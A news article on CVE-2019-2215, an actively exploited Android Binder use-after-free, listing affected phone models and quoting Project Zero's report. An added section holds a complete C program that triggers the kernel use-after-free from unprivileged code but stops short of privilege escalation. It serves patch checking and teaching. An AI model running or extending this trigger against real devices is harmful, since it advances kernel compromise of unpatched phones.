The critical flaw, which is being exploited in the wild, affects phone models from Samsung, Huawei, Google (Pixel) and others
Google Project Zero researcher Maddie Stone uncovered a critical zero-day vulnerability that impacts numerous Android phone models. The flaw, tracked as CVE-2019-2215, is a use-after-free in the Binder driver of the Android kernel. An attacker who already has code running on the device can use it to escalate privileges and gain full control of the kernel; it does not work remotely on its own.
The bug was fixed in the Linux 4.14 LTS kernel and in the Android 3.18, 4.4 and 4.9 kernel branches in December 2017, before any CVE number was assigned. Stone, however, found that the fix never reached many shipping devices: her report lists affected phones from at least seven brands, including Samsung, Xiaomi, Huawei, Google (Pixel), Motorola, LG and Oppo.
The report also stated that the exploit was attributed to NSO Group, an Israeli company known for acquiring zero-days and selling surveillance tooling built on them to governments.
The Project Zero bug report was made public on October 4, just seven days after it was reported to the Android security team, in line with Project Zero's seven-day disclosure deadline for bugs under active exploitation.
The vulnerability was patched in older kernel branches but still affects many devices shipping with kernels released after April 2018
The patch, by then nearly two years old, had been applied to the Linux 4.14 LTS kernel and to the Android 3.18, 4.4 and 4.9 kernel branches, but many vendor kernels never picked it up. As a result, Stone said, many users running the latest available Android builds are still vulnerable. In particular, the following models running Android 8.x and later are affected:
- Pixel 2 with Android 9 and Android 10 preview
- Huawei P20
- Xiaomi Redmi 5A
- Xiaomi Redmi Note 5
- Xiaomi A1
- Oppo A3
- Moto Z3
- LG phones running Android Oreo (8.x)
- Samsung Galaxy S7, S8 and S9
Fortunately for Pixel 3, 3 XL and 3a owners, those devices are not affected. Stone noted that the "exploit requires little or no per-device customization", which means it is likely usable against other phones as well, but there is currently no confirmed evidence of affected devices beyond those listed above.
Potential victims need to install a malicious application (or be hit by a browser exploit chain) for the exploit to work
As Stone pointed out, the attacker needs code running on the device first, typically a malicious app that the victim installs. Alternatively, the bug can be chained with a renderer exploit (for example in Chrome) and delivered through the browser, since the Binder device is reachable from inside the renderer sandbox. CVE-2019-2215 is therefore a critical local privilege escalation, not a remote code execution bug: on its own it cannot compromise a device without some prior foothold. Stone wrote in the Project Zero bug tracker (hosted on the Chromium issue tracker):
The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox.
I’ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215. I’ve also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019.
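To make the "untrusted app code execution" requirement concrete, the following is an added example (not code from the article, and not Stone's attached proof-of-concept) that reproduces the publicly documented crash trigger for CVE-2019-2215: the Binder driver frees the calling thread's binder_thread on BINDER_THREAD_EXIT while epoll still holds a pointer to the wait queue embedded in it, and the later epoll removal writes into the freed object. It contains only the use-after-free trigger, not the kernel read/write or root stages, and it assumes a Linux/Android build environment with /dev/binder present at runtime; on a kernel carrying the December 2017 fix ("ANDROID: binder: remove waitqueue when thread exits") the sequence is harmless, while an unpatched kernel built with KASAN reports the use-after-free in dmesg.

```c
// Added example: trigger sequence for CVE-2019-2215 (Binder use-after-free).
// Not code from the original article or from Stone's report; modelled on the
// publicly documented four-step trigger. Unprivileged: it needs nothing more
// than the ability to open /dev/binder, which any untrusted app (and the
// Chrome renderer sandbox) has.
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* BINDER_THREAD_EXIT is _IOW('b', 8, __s32) in the Android UAPI header
 * (linux/android/binder.h); the numeric value is spelled out here so the
 * example builds on a plain glibc/musl toolchain without Android headers. */
#define BINDER_THREAD_EXIT 0x40046208UL

/* Runs the trigger sequence against the given binder device node (assumed
 * path, normally "/dev/binder"). Returns 0 if every step was issued and -1
 * (with errno set) if the device could not be opened or a step failed before
 * the freed-object access. A return of 0 does NOT mean the kernel is
 * vulnerable: on a patched kernel the same sequence completes harmlessly. */
int trigger_cve_2019_2215(const char *binder_path)
{
    int fd = open(binder_path, O_RDONLY);
    if (fd < 0)
        return -1;

    int epfd = epoll_create1(0);
    if (epfd < 0) {
        close(fd);
        return -1;
    }

    /* 1. Register the binder fd with epoll. The driver's poll handler links
     *    an epoll wait entry into the wait queue that lives inside the
     *    calling thread's binder_thread structure. */
    struct epoll_event ev = { .events = EPOLLIN };
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev) < 0) {
        close(epfd);
        close(fd);
        return -1;
    }

    /* 2. Ask the driver to tear down the calling thread's binder_thread.
     *    On an unpatched kernel the structure is freed while epoll still
     *    holds a pointer to the wait queue embedded in it. */
    if (ioctl(fd, BINDER_THREAD_EXIT, NULL) < 0) {
        close(epfd);
        close(fd);
        return -1;
    }

    /* 3. Removing the fd from epoll makes the kernel unlink the wait entry,
     *    i.e. write into the freed binder_thread: the use-after-free.
     *    (Closing epfd without this call would reach the same path.) */
    epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &ev);

    /* 4. Clean up. */
    close(epfd);
    close(fd);
    return 0;
}

int main(void)
{
    if (trigger_cve_2019_2215("/dev/binder") < 0) {
        fprintf(stderr, "binder sequence not run: %s\n", strerror(errno));
        return 1;
    }
    puts("sequence issued; on an unpatched KASAN kernel check dmesg for a use-after-free report");
    return 0;
}
```

The check a practitioner wants from this is the negative one: run it on a test device with a KASAN kernel, and if dmesg stays quiet the Binder fix is present in that build. Note that the trigger alone proves only the free; turning the dangling wait queue into the arbitrary kernel read/write Stone describes is the separate, device-specific exploitation stage that this example deliberately omits.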
Google said that the fix would ship in the coming days. Until it does, the flaw remains exploitable in the wild, so owners of the devices listed above should be especially careful: avoid installing apps from outside the official app store and apply the security update as soon as it is offered.